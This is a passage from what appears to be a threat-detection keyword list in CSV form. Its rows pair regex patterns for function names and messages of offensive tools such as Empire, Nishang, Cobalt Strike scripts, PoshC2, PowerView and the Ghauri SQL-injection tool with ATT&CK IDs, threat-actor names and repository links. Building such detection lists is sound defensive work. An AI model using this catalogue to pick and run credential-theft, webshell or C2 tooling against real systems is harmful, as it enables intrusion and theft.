T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - 
TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46333" "*Get-Wlan-Keys*",".{0,1000}Get\-Wlan\-Keys.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","46334" "*Get-WLAN-Keys*",".{0,1000}Get\-WLAN\-Keys.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46335" "*Get-WLAN-Keys.ps1*",".{0,1000}Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","46336" "*Get-WLAN-Keys.ps1*",".{0,1000}Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46337" "*Get-Wlan-Keys.ps1*",".{0,1000}Get\-Wlan\-Keys\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46338" "*Get-WMIEventLogins*",".{0,1000}Get\-WMIEventLogins.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","46339" "*Get-WMIRegCachedRDPConnection *",".{0,1000}Get\-WMIRegCachedRDPConnection\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","46344" "*getwmiregcachedrdpconnection*",".{0,1000}getwmiregcachedrdpconnection.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 
- T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","46345" "*Get-WMIRegCachedRDPConnection*",".{0,1000}Get\-WMIRegCachedRDPConnection.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","46346" "*Get-WMIRegCachedRDPConnection*",".{0,1000}Get\-WMIRegCachedRDPConnection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46347" "*get-wmiregcachedrdpconnection*",".{0,1000}get\-wmiregcachedrdpconnection.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - 
TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46348" "*Get-WMIRegCachedRDPConnection*",".{0,1000}Get\-WMIRegCachedRDPConnection.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46349" "*getwmireglastloggedon*",".{0,1000}getwmireglastloggedon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - 
FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","46350" "*Get-WMIRegLastLoggedOn*",".{0,1000}Get\-WMIRegLastLoggedOn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - 
Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","46351" "*Get-WMIRegLastLoggedOn*",".{0,1000}Get\-WMIRegLastLoggedOn.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46352" "*get-wmireglastloggedon*",".{0,1000}get\-wmireglastloggedon.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46353" "*Get-WMIRegLastLoggedOn*",".{0,1000}Get\-WMIRegLastLoggedOn.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46354" "*Get-WMIRegMountedDrive*",".{0,1000}Get\-WMIRegMountedDrive.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46355" "*get-wmiregmounteddrive*",".{0,1000}get\-wmiregmounteddrive.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - 
TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46356" "*Get-WMIRegMountedDrive*",".{0,1000}Get\-WMIRegMountedDrive.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46357" "*Get-WMIRegProxy*",".{0,1000}Get\-WMIRegProxy.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","46358" "*Get-WorkingHours*",".{0,1000}Get\-WorkingHours.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46359" "*gexplorer.exe*",".{0,1000}gexplorer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","46360" "*ghauri currently only supports DBMS fingerprint payloads for Microsoft Access*",".{0,1000}ghauri\scurrently\sonly\ssupports\sDBMS\sfingerprint\spayloads\sfor\sMicrosoft\sAccess.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46362" "*Ghauri detected connection errors multiple times*",".{0,1000}Ghauri\sdetected\sconnection\serrors\smultiple\stimes.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability 
Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46363" "*Ghauri is expecting database name to enumerate table(s) entries*",".{0,1000}Ghauri\sis\sexpecting\sdatabase\sname\sto\senumerate\stable\(s\)\sentries.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46364" "*ghauri -u *",".{0,1000}ghauri\s\-u\s.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46365" "*ghauri-*\ghauri-*",".{0,1000}ghauri\-.{0,1000}\\ghauri\-.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46366" "*ghauri.common.config*",".{0,1000}ghauri\.common\.config.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46367" "*ghauri.common.lib*",".{0,1000}ghauri\.common\.lib.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based 
